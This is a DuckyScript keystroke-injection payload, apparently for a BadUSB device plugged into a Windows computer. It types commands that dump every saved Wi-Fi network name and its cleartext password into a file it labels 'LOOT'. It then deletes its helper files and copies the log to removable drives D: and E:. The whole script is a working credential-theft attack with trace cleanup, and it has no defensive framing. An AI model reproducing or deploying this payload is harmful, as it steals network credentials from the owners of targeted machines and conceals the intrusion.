REM Open Cmd
DELAY 9000
WINDOWS r
DELAY 500
STRING cmd
ENTER
DELAY 200
REM Get all SSID
STRING cd %USERPROFILE% & netsh wlan show profiles | findstr "All" > a.txt
ENTER
REM Create a filter.bat to get all the profile names
STRING echo SETLOCAL EnableDelayedExpansion^
ENTER
ENTER
STRING for /f "tokens=5*" %%i in (a.txt) do (^
ENTER
ENTER
STRING set val=%%i %%j^
ENTER
ENTER
STRING if "!val:~-1!" == " " set val=!val:~0,-1!^
ENTER
ENTER
STRING echo !val!^>^>b.txt) > filter.bat
ENTER
REM Run filter.bat and save all profile names in b.txt
STRING filter.bat
DELAY 300
ENTER
REM --> Save all the LOOT in Log.txt and delete the other files
STRING (for /f "tokens=*" %i in (b.txt) do @echo     SSID: %i & netsh wlan show profiles name="%i" key=clear | findstr /c:"Key Content" & echo.) > Log.txt
ENTER
DELAY 1000
STRING exit
DELAY 500
ENTER
DELAY 1000
REM Mail Log.txt
WINDOWS r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING del .\a.txt 
ENTER
STRING del .\b.txt 
ENTER
STRING del .\filter.bat
ENTER
STRING Copy-Item -Path .\Log.txt -Destination D:\
ENTER
STRING Copy-Item -Path .\Log.txt -Destination E:\
ENTER
STRING del .\Log.txt
ENTER
STRING exit
ENTER